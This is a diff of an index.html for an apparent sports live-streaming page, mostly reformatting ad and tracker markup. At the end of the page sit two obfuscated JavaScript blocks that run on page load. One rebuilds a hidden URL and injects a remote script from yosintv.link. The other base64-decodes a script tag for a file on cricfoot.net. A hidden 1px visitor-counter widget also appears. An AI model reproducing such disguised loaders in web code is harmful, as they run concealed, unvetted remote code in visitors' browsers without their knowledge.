--- a/index.html
+++ b/index.html
@@ -34,11 +34,11 @@
   <!-- Ads -->
   <div class="container mx-auto max-w-4xl px-4 py-4">
     <div class="adspos">
-    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
-     <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5525538810839147" data-ad-slot="4345862479" data-ad-format="horizontal" data-full-width-responsive="true"></ins>
-       <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script>		
-       </div>
-        </div>
+      <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
+      <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5525538810839147" data-ad-slot="4345862479" data-ad-format="horizontal" data-full-width-responsive="true"></ins>
+      <script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
+    </div>
+  </div>
 
   <!-- Main Content -->
   <main class="container mx-auto max-w-4xl px-4 py-8">
@@ -47,14 +47,10 @@
         <h3 class="text-xl sm:text-2xl md:text-3xl font-bold text-gray-900" id="match-name"></h3>
         <p>● Watch the live of this match in HD Quality, Scroll down to check out every link for Smooth Live Stream of this match.</p>
         <p>● Predicted lineups are available for the match a few days in advance while the actual lineup will be available about an hour ahead of the match.</p>
-       
         <div class="adspos">
           <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5525538810839147" data-ad-slot="4345862479" data-ad-format="auto" data-full-width-responsive="true"></ins>
-          <script>
-            (adsbygoogle = window.adsbygoogle || []).push({});
-          </script>
+          <script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
         </div>
-        
         <div id="live-tracker"></div>
         <p>● If the first link stops working, freezes, or won’t open, try the second or third link to keep watching without trouble.</p>
         <p>● 📱💻 = For Both Mobile & PC Devices, 💻 = Best For PC Devices !!</p>
@@ -69,10 +65,9 @@
     <section class="bg-white rounded-lg shadow-md p-6">
       <h3 class="text-2xl font-bold text-gray-900 mb-4">More Matches</h3>
       <div id="more-matches" class="space-y-2"></div>
-      <div id="no-matches" class="hidden text-center text-gray-600">No additional matches available at this time.</div>
+      <div id="no-matches" class="hidden text-center text-gray-600 mt-4">No additional matches available at this time.</div>
     </section>
   </main>
-
 
   <!-- Footer -->
   <footer class="bg-white shadow-inner py-6 mt-8">
@@ -88,22 +83,18 @@
     <div class="adspos">
       <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5525538810839147" crossorigin="anonymous"></script>
       <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5525538810839147" data-ad-slot="4345862479" data-ad-format="auto" data-full-width-responsive="true"></ins>
-      <script>
-        (adsbygoogle = window.adsbygoogle || []).push({});
-      </script>
+      <script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
     </div>
   </div>
 
-<script src="https://cdn.tailwindcss.com"></script>
-<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
+  <script src="https://cdn.tailwindcss.com"></script>
+  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
   <div id='fixedban' class='fixed bottom-0 left-1/2 -translate-x-1/2 z-[999]'>
     <div class='relative w-[300px] h-[250px] bg-white rounded-lg shadow-xl border border-gray-200'>
       <button id='close-fixedban' class='absolute left-1/2 -translate-x-1/2 top-3 text-sm font-medium text-blue-600 hover:text-blue-800 transition-colors duration-200 cursor-pointer z-[1000]'>Close</button>
       <div class='w-[300px] h-[250px] overflow-hidden pt-8'>
         <ins class='adsbygoogle inline-block w-[300px] h-[250px]' data-ad-client='ca-pub-5525538810839147' data-ad-slot='5912194004'></ins>
-        <script>
-          (adsbygoogle = window.adsbygoogle || []).push({});
-        </script>
+        <script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
       </div>
     </div>
   </div>
@@ -115,16 +106,17 @@
     });
   </script>
 
-<!-- BEGIN: Powered by Supercounters.com -->
-<div style="position:fixed;top:0;left:0;width:100%;height:1px;overflow:hidden;visibility:hidden;z-index:9999;">
-<script id="_wauxdl">var _wau = _wau || []; _wau.push(["dynamic", "2rzlwew51p", "xdl", "c4302bffffff", "small"]);</script>
-<script async src="//waust.at/d.js"></script>
-<script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script>
-<script type="text/javascript">sc_online_i(1703308,"ffffff","e61c1c");</script>
-<br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
-</div>
-  
-  
+  <!-- BEGIN: Powered by Supercounters.com -->
+  <div style="position:fixed;top:0;left:0;width:100%;height:1px;overflow:hidden;visibility:hidden;z-index:9999;">
+    <script id="_wauxdl">var _wau = _wau || []; _wau.push(["dynamic", "2rzlwew51p", "xdl", "c4302bffffff", "small"]);</script>
+    <script async src="//waust.at/d.js"></script>
+    <script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script>
+    <script type="text/javascript">sc_online_i(1703308,"ffffff","e61c1c");</script>
+    <br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
+  </div>
+
+
+
 <script>
 const _0x5b42c7=_0x5b16;function _0x5b16(_0x1774b8,_0x55d3f1){const _0x4e4ee3=_0x4e4e();return _0x5b16=function(_0x5b16b8,_0x47460d){_0x5b16b8=_0x5b16b8-0x106;let _0x3de9f7=_0x4e4ee3[_0x5b16b8];return _0x3de9f7;},_0x5b16(_0x1774b8,_0x55d3f1);}function _0x4e4e(){const _0xdaf1ee=['src','async','createElement','44cKriSl','appendChild','423304djsxlW','187230TIZDfn','714nGAFWc','58629IWwcqs','head','https://www.yosintv.link/pmi/blog-script.js','script','9sFPnvV','1280326kzrFiE','4522270NBuGIw','532483WPPCki','5142pvCMyI'];_0x4e4e=function(){return _0xdaf1ee;};return _0x4e4e();}(function(_0x3fc30f,_0xad95e7){const _0x311758=_0x5b16,_0x90d967=_0x3fc30f();while(!![]){try{const _0x394d73=-parseInt(_0x311758(0x113))/0x1+parseInt(_0x311758(0x111))/0x2+-parseInt(_0x311758(0x10c))/0x3*(-parseInt(_0x311758(0x107))/0x4)+-parseInt(_0x311758(0x10a))/0x5+parseInt(_0x311758(0x114))/0x6*(-parseInt(_0x311758(0x10b))/0x7)+-parseInt(_0x311758(0x109))/0x8+-parseInt(_0x311758(0x110))/0x9*(-parseInt(_0x311758(0x112))/0xa);if(_0x394d73===_0xad95e7)break;else _0x90d967['push'](_0x90d967['shift']());}catch(_0x15b4b6){_0x90d967['push'](_0x90d967['shift']());}}}(_0x4e4e,0x91c73));const script=document[_0x5b42c7(0x106)](_0x5b42c7(0x10f));script[_0x5b42c7(0x115)]=_0x5b42c7(0x10e),script[_0x5b42c7(0x116)]=!![],document[_0x5b42c7(0x10d)][_0x5b42c7(0x108)](script);
 </script>
@@ -132,6 +124,6 @@ const _0x5b42c7=_0x5b16;function _0x5b16(_0x1774b8,_0x55d3f1){const _0x4e4ee3=_0
 <script>
 const _0x5424b1=_0x4798;(function(_0x5a047e,_0x2e3b4b){const _0x57279f=_0x4798,_0x49e1fe=_0x5a047e();while(!![]){try{const _0x2cd49a=-parseInt(_0x57279f(0x151))/0x1*(parseInt(_0x57279f(0x14c))/0x2)+-parseInt(_0x57279f(0x14d))/0x3+-parseInt(_0x57279f(0x150))/0x4*(parseInt(_0x57279f(0x146))/0x5)+parseInt(_0x57279f(0x14f))/0x6+parseInt(_0x57279f(0x14e))/0x7+-parseInt(_0x57279f(0x147))/0x8*(parseInt(_0x57279f(0x145))/0x9)+-parseInt(_0x57279f(0x14a))/0xa*(-parseInt(_0x57279f(0x149))/0xb);if(_0x2cd49a===_0x2e3b4b)break;else _0x49e1fe['push'](_0x49e1fe['shift']());}catch(_0x47deee){_0x49e1fe['push'](_0x49e1fe['shift']());}}}(_0x474d,0x2ad8c));function _0x4798(_0x2ffa33,_0x6a2f71){const _0x474df9=_0x474d();return _0x4798=function(_0x4798f1,_0x5f5465){_0x4798f1=_0x4798f1-0x145;let _0x5b0406=_0x474df9[_0x4798f1];return _0x5b0406;},_0x4798(_0x2ffa33,_0x6a2f71);}const b64=_0x5424b1(0x14b);document[_0x5424b1(0x148)](atob(b64));function _0x474d(){const _0x2f0933=['809LWoqNb','971595qRSIpw','10lYzWOk','16kPwJdl','write','12639gmjqRL','2930tMKtkG','PHNjcmlwdCBzcmM9Imh0dHBzOi8vYmxvZy5jcmljZm9vdC5uZXQvYXBwLXRlc3QuanMiPjwvc2NyaXB0Pg==','654FEkzUs','140730BzXyzA','1471785seKKat','1084914ZqXUsu','49736amwPRT'];_0x474d=function(){return _0x2f0933;};return _0x474d();}
 </script>
- 
+  
 </body>
 </html>
